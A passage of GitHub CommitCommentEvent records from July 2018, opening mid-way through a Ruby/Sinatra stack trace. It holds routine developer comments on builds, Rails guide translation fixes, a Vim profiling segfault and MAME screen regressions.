`deploy'\n/app/objects/job.rb:38:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-22T01:10:55Z"}
{"id":"7999435147","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29790637,"position":null,"line":null,"path":null,"commit_id":"27c02bc659f002ef986f3e16a4755166c3fc3c20","created_at":"2018-07-22T01:11:56Z","updated_at":"2018-07-22T01:11:56Z","author_association":"NONE","body":"develop (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27c02bc659f002ef986f3e16a4755166c3fc3c20-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-22T01:11:56Z"}
{"id":"7999439266","type":"CommitCommentEvent","actor":{"login":"la60312"},"repo":{"name":"igsb/dpdl"},"payload":{"comment":{"id":29790642,"position":null,"line":null,"path":null,"commit_id":"b28b7402f2faa303bb08e90badd863c6bd610938","created_at":"2018-07-22T01:16:34Z","updated_at":"2018-07-22T01:16:34Z","author_association":"COLLABORATOR","body":"It is because you used tab instead of 2 spaces. Please replace tab with 2 spaces. Tab has different length in different IDE or environment. \r\n\r\nI checked with two different browsers and it both looks like this. That's why I said it is clearly not indented correctly just based on what is shown in GitHub layout.\r\n![image](https://user-images.githubusercontent.com/8877903/43041275-85e8e862-8d5b-11e8-95a7-16e3a97f38b0.png)\r\n"}},"created_at":"2018-07-22T01:16:34Z"}
{"id":"7999442840","type":"CommitCommentEvent","actor":{"login":"Ozric"},"repo":{"name":"Ozric/somafm-radio-gnome-ext"},"payload":{"comment":{"id":29790647,"position":null,"line":null,"path":null,"commit_id":"bcb85820818d1394c02f363d8a7f3c7af0dacec6","created_at":"2018-07-22T01:20:19Z","updated_at":"2018-07-22T01:20:19Z","author_association":"OWNER","body":"The extra bits make a big difference in sound quality, IMO. Please consider."}},"created_at":"2018-07-22T01:20:19Z"}
{"id":"7999450860","type":"CommitCommentEvent","actor":{"login":"SwiftFlying"},"repo":{"name":"JyeSmith/rx5808-pro-diversity"},"payload":{"comment":{"id":29790656,"position":null,"line":null,"path":null,"commit_id":"e26dcade340bc1f7310cc18ff8ae5befa997ae84","created_at":"2018-07-22T01:29:25Z","updated_at":"2018-07-22T01:29:25Z","author_association":"NONE","body":"https://www.rcgroups.com/forums/showthread.php?3102544-How-to-flash-RealAcc-RX5808-Pro-Plus-OSD-with-Betaflight-and-AchilleΣ\r\nI am the manufacturer of this, and you can add OLED. with STM32. Now users prefer Achille sigma firmware ,Because it's just OSD and OLED"}},"created_at":"2018-07-22T01:29:25Z"}
{"id":"7999451152","type":"CommitCommentEvent","actor":{"login":"Asukiran"},"repo":{"name":"Asukiran/BP_iris_python"},"payload":{"comment":{"id":29790657,"position":2,"line":2,"path":"README.md","commit_id":"3f60a544be4f7d4f0087e87c2a4c5bc38eabefe8","created_at":"2018-07-22T01:29:47Z","updated_at":"2018-07-22T01:29:47Z","author_association":"OWNER","body":"python语言的BP算法合集"}},"created_at":"2018-07-22T01:29:47Z"}
{"id":"7999452776","type":"CommitCommentEvent","actor":{"login":"Asukiran"},"repo":{"name":"Asukiran/BP_iris_python"},"payload":{"comment":{"id":29790658,"position":null,"line":null,"path":null,"commit_id":"3f60a544be4f7d4f0087e87c2a4c5bc38eabefe8","created_at":"2018-07-22T01:31:31Z","updated_at":"2018-07-22T01:31:31Z","author_association":"OWNER","body":"python的BP算法合集"}},"created_at":"2018-07-22T01:31:31Z"}
{"id":"7999453681","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29790659,"position":null,"line":null,"path":null,"commit_id":"f4cc169932bc399132ebb78209f071b33c62ae16","created_at":"2018-07-22T01:32:39Z","updated_at":"2018-07-22T01:32:39Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-251](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-251).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-251-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-22T01:32:39Z"}
{"id":"7999459271","type":"CommitCommentEvent","actor":{"login":"cipig"},"repo":{"name":"atomiclabs/hyperdex"},"payload":{"comment":{"id":29790664,"position":null,"line":null,"path":null,"commit_id":"31d55a73254bacbcd8e90024ed698d15a26a5673","created_at":"2018-07-22T01:39:18Z","updated_at":"2018-07-22T01:39:18Z","author_association":"NONE","body":"the symbol is \"PAC\": https://github.com/cipig/coins/blob/master/coins#L51"}},"created_at":"2018-07-22T01:39:18Z"}
{"id":"7999459426","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29790665,"position":null,"line":null,"path":null,"commit_id":"28defc5a048a2829d0b58a789318a7b27674697e","created_at":"2018-07-22T01:39:27Z","updated_at":"2018-07-22T01:39:27Z","author_association":"CONTRIBUTOR","body":"I don't think it got all of them—this commit has 371 changed files, that one has 60."}},"created_at":"2018-07-22T01:39:27Z"}
{"id":"7999459852","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790666,"position":786,"line":758,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:39:56Z","updated_at":"2018-07-22T01:39:56Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-22T01:39:56Z"}
{"id":"7999460350","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790667,"position":905,"line":849,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:40:27Z","updated_at":"2018-07-22T01:40:27Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-22T01:40:27Z"}
{"id":"7999460639","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790668,"position":965,"line":909,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:40:47Z","updated_at":"2018-07-22T01:40:47Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-22T01:40:47Z"}
{"id":"7999460909","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790669,"position":1022,"line":954,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:41:08Z","updated_at":"2018-07-22T01:41:08Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-22T01:41:08Z"}
{"id":"7999461543","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790670,"position":1289,"line":1260,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:41:50Z","updated_at":"2018-07-22T01:41:50Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-22T01:41:50Z"}
{"id":"7999462099","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790671,"position":1469,"line":1483,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:42:31Z","updated_at":"2018-07-22T01:42:31Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-22T01:42:31Z"}
{"id":"7999462187","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790672,"position":1516,"line":1526,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:42:38Z","updated_at":"2018-07-22T01:42:38Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-22T01:42:38Z"}
{"id":"7999462244","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790673,"position":1522,"line":1531,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:42:42Z","updated_at":"2018-07-22T01:42:42Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-22T01:42:42Z"}
{"id":"7999462322","type":"CommitCommentEvent","actor":{"login":"brammool"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":29790674,"position":null,"line":null,"path":null,"commit_id":"ad6480961080f80a455b2394f27b02935a2ded52","created_at":"2018-07-22T01:42:47Z","updated_at":"2018-07-22T01:42:47Z","author_association":"CONTRIBUTOR","body":"\nDaniel Hahler wrote:\n\n> @brammool \n> This commit causes a segfault with tests where I am using `:profile start` and `:profile! pattern/to/file` with an indent plugin.\n> I am not using `:profdel`.\n\nAre you saying that before the patch your code worked OK?\n\nPlease try to catch the error under valgrand or ASAN, to find out what\nhappened to the function name.\n\n> The tests are using vimrunner, and therefor interact with a server\n> using `--servername` etc.  I've noticed that the server vanished\n> inside the Docker container, but could also reproduce it outside now.\n> The setup is not that easy, so hopefully I can provide enough\n> information here:\n> \n> ```\n> #0  0x000055593398f806 in func_dump_profile (fd=0x555935daeac0) at userfunc.c:2601\n> 2601\t\t\t    prof_func_line(fd, fp->uf_tml_count[i],\n> (gdb) p fd\n> $1 = (FILE *) 0x555935daeac0\n> (gdb) p fp->uf_tml_count\n> $2 = (int *) 0x0\n> (gdb) p i\n> $3 = 0\n> ```\n\nHmm, maybe you are redefining the function after using it?\nMaybe this change helps (just guessing!):\n\n--- ../../git/vim81/src/userfunc.c      2018-07-10 19:39:14.998972995 +0200\n+++ userfunc.c\t2018-07-22 03:16:40.989174172 +0200\n@@ -2438,6 +2438,7 @@\n     fp->uf_tml_total = NULL;\n     fp->uf_tml_self = NULL;\n     fp->uf_profiling = FALSE;\n+    fp->uf_prof_initialized = FALSE;\n     if (prof_def_func())\n \tfunc_do_profile(fp);\n #endif\n\n\n\n-- \nFacepalm reply #9: \"Speed up, you can drive 80 here\" \"Why, the cars behind us\nare also driving 60\"\n\n /// Bram Moolenaar -- Bram@Moolenaar.net -- http://www.Moolenaar.net   \\\\\\\n///        sponsor Vim, vote for features -- http://www.Vim.org/sponsor/ \\\\\\\n\\\\\\  an exciting new programming language -- http://www.Zimbu.org        ///\n \\\\\\            help me help AIDS victims -- http://ICCF-Holland.org    ///\n"}},"created_at":"2018-07-22T01:42:47Z"}
{"id":"7999462560","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790676,"position":1587,"line":1587,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:43:05Z","updated_at":"2018-07-22T01:43:05Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-22T01:43:05Z"}
{"id":"7999462621","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790677,"position":1604,"line":1601,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:43:10Z","updated_at":"2018-07-22T01:43:10Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-22T01:43:10Z"}
{"id":"7999462707","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790678,"position":1629,"line":1624,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:43:17Z","updated_at":"2018-07-22T01:43:17Z","author_association":"COLLABORATOR","body":"updated (required)"}},"created_at":"2018-07-22T01:43:17Z"}
{"id":"7999462863","type":"CommitCommentEvent","actor":{"login":"JyeSmith"},"repo":{"name":"JyeSmith/rx5808-pro-diversity"},"payload":{"comment":{"id":29790679,"position":null,"line":null,"path":null,"commit_id":"e26dcade340bc1f7310cc18ff8ae5befa997ae84","created_at":"2018-07-22T01:43:28Z","updated_at":"2018-07-22T01:43:28Z","author_association":"OWNER","body":"Manufacturer of the module?\r\n\r\nDo you have a public web site with email contact?"}},"created_at":"2018-07-22T01:43:28Z"}
{"id":"7999463001","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790681,"position":1655,"line":1656,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:43:38Z","updated_at":"2018-07-22T01:43:38Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-22T01:43:38Z"}
{"id":"7999463500","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790684,"position":1673,"line":1671,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:44:11Z","updated_at":"2018-07-22T01:44:11Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-22T01:44:11Z"}
{"id":"7999463632","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790685,"position":1771,"line":1782,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:44:20Z","updated_at":"2018-07-22T01:44:20Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-22T01:44:20Z"}
{"id":"7999463739","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790686,"position":1818,"line":1822,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:44:28Z","updated_at":"2018-07-22T01:44:28Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-22T01:44:28Z"}
{"id":"7999463858","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790687,"position":1901,"line":1921,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:44:37Z","updated_at":"2018-07-22T01:44:37Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-22T01:44:37Z"}
{"id":"7999464001","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790688,"position":1955,"line":2010,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:44:47Z","updated_at":"2018-07-22T01:44:47Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-22T01:44:47Z"}
{"id":"7999464059","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790690,"position":1967,"line":2022,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:44:52Z","updated_at":"2018-07-22T01:44:52Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-22T01:44:52Z"}
{"id":"7999464131","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790691,"position":1989,"line":2056,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:44:57Z","updated_at":"2018-07-22T01:44:57Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-22T01:44:57Z"}
{"id":"7999464664","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790692,"position":1998,"line":2068,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:45:32Z","updated_at":"2018-07-22T01:45:32Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-22T01:45:32Z"}
{"id":"7999465397","type":"CommitCommentEvent","actor":{"login":"sarathsp06"},"repo":{"name":"sagarchoudhary96/TheGreatGatsby"},"payload":{"comment":{"id":29790693,"position":null,"line":null,"path":null,"commit_id":"56b587c27f4dcb344da60bd9de6cf0db3de81617","created_at":"2018-07-22T01:46:23Z","updated_at":"2018-07-22T01:46:23Z","author_association":"NONE","body":"Please do not push Exotel token in public repo\nhttps://github.com/sagarchoudhary96/TheGreatGatsby/blob/56b587c27f4dcb344da60bd9de6cf0db3de81617/triggerCall.php#L13 \n"}},"created_at":"2018-07-22T01:46:23Z"}
{"id":"7999465458","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790694,"position":2013,"line":2141,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:46:28Z","updated_at":"2018-07-22T01:46:28Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-22T01:46:28Z"}
{"id":"7999465599","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790695,"position":2020,"line":2147,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:46:37Z","updated_at":"2018-07-22T01:46:37Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-22T01:46:37Z"}
{"id":"7999465711","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790696,"position":2038,"line":2179,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:46:47Z","updated_at":"2018-07-22T01:46:47Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-22T01:46:47Z"}
{"id":"7999465869","type":"CommitCommentEvent","actor":{"login":"petk"},"repo":{"name":"swoole/swoole-src"},"payload":{"comment":{"id":29790697,"position":null,"line":null,"path":null,"commit_id":"942a81bde47e5578ad3ff146aa6aeadaccb2035a","created_at":"2018-07-22T01:46:58Z","updated_at":"2018-07-22T01:46:58Z","author_association":"CONTRIBUTOR","body":"This fix is now sent in pull request #1826 "}},"created_at":"2018-07-22T01:46:58Z"}
{"id":"7999465998","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29790699,"position":2264,"line":2467,"path":"guides/source/association_basics.md","commit_id":"192f67bc3563a54d1bc406bce076be80a6ff0b1e","created_at":"2018-07-22T01:47:07Z","updated_at":"2018-07-22T01:47:07Z","author_association":"COLLABORATOR","body":"fixed"}},"created_at":"2018-07-22T01:47:07Z"}
{"id":"7999466624","type":"CommitCommentEvent","actor":{"login":"mbsg"},"repo":{"name":"clowwindy/shadowsocks-libev"},"payload":{"comment":{"id":29790703,"position":null,"line":null,"path":null,"commit_id":"1e023519d3332cda3c48b4d04c8d024b6860cb0a","created_at":"2018-07-22T01:47:52Z","updated_at":"2018-07-22T01:47:52Z","author_association":"NONE","body":"."}},"created_at":"2018-07-22T01:47:52Z"}
{"id":"7999468318","type":"CommitCommentEvent","actor":{"login":"jiniC"},"repo":{"name":"jiniC/react-router-contact-list"},"payload":{"comment":{"id":29790708,"position":null,"line":null,"path":null,"commit_id":"c45377c14f6e6b871c7c40685908fb01b157b71c","created_at":"2018-07-22T01:50:02Z","updated_at":"2018-07-22T01:50:02Z","author_association":"OWNER","body":"create-react-app react-router-contact-list\r\nyarn add react-router-dom"}},"created_at":"2018-07-22T01:50:02Z"}
{"id":"7999468503","type":"CommitCommentEvent","actor":{"login":"ablodge"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29790709,"position":null,"line":null,"path":null,"commit_id":"28defc5a048a2829d0b58a789318a7b27674697e","created_at":"2018-07-22T01:50:09Z","updated_at":"2018-07-22T01:50:09Z","author_association":"CONTRIBUTOR","body":"Okay, I reverted the commit. See how it looks now."}},"created_at":"2018-07-22T01:50:09Z"}
{"id":"7999468696","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"atomiclabs/hyperdex"},"payload":{"comment":{"id":29790711,"position":null,"line":null,"path":null,"commit_id":"31d55a73254bacbcd8e90024ed698d15a26a5673","created_at":"2018-07-22T01:50:19Z","updated_at":"2018-07-22T01:50:19Z","author_association":"MEMBER","body":"Not according to CMC https://coinmarketcap.com/currencies/paccoin/"}},"created_at":"2018-07-22T01:50:19Z"}
{"id":"7999469630","type":"CommitCommentEvent","actor":{"login":"chaoxz2"},"repo":{"name":"chaoxz2/chaoxz2.github.io"},"payload":{"comment":{"id":29790712,"position":null,"line":null,"path":null,"commit_id":"8ed14439768324b7c1b7fbb06f0bd0235fcd435b","created_at":"2018-07-22T01:51:22Z","updated_at":"2018-07-22T01:51:22Z","author_association":"OWNER","body":"okok"}},"created_at":"2018-07-22T01:51:22Z"}
{"id":"7999471637","type":"CommitCommentEvent","actor":{"login":"newcoder2019"},"repo":{"name":"newcoder2019/activity1"},"payload":{"comment":{"id":29790714,"position":null,"line":null,"path":null,"commit_id":"23f876dc49aa4b7d6ccc21236d5ce40345adbc6b","created_at":"2018-07-22T01:53:45Z","updated_at":"2018-07-22T01:53:45Z","author_association":"OWNER","body":"This is the git hub exercise for creating a repository."}},"created_at":"2018-07-22T01:53:45Z"}
{"id":"7999472481","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29790718,"position":null,"line":null,"path":null,"commit_id":"28defc5a048a2829d0b58a789318a7b27674697e","created_at":"2018-07-22T01:54:43Z","updated_at":"2018-07-22T01:54:43Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-22T01:54:43Z"}
{"id":"7999473161","type":"CommitCommentEvent","actor":{"login":"Tafoid"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29790721,"position":null,"line":null,"path":null,"commit_id":"f432c4475a31ff077170a8e7743a4cf56a1be80e","created_at":"2018-07-22T01:55:31Z","updated_at":"2018-07-22T01:55:31Z","author_association":"CONTRIBUTOR","body":"This has left some machines now showing more or different screens than previously based on my screenshot comparison pass of all machines which show in -listdevices as having more then one Video Screen:\r\n\r\n- coco3 and clones - coco3.cpp\r\n![coco3-diff](https://user-images.githubusercontent.com/9075896/43041482-560391ea-8d30-11e8-8514-ab66777e4adb.png)\r\n- ivg09 - tavernie.cpp\r\n![ivg09-diff](https://user-images.githubusercontent.com/9075896/43041484-596acd4e-8d30-11e8-9f3a-a1e14836e382.png)\r\n- patinho - patinho_feio.cpp\r\n![patinho-diff](https://user-images.githubusercontent.com/9075896/43041485-5cab337c-8d30-11e8-8826-a96962bee9c9.png)\r\n- pc8500 - pc8401a.cpp\r\n![pc8500-diff](https://user-images.githubusercontent.com/9075896/43041486-5f88fade-8d30-11e8-812f-a8ad6bb7c43d.png)\r\n"}},"created_at":"2018-07-22T01:55:31Z"}
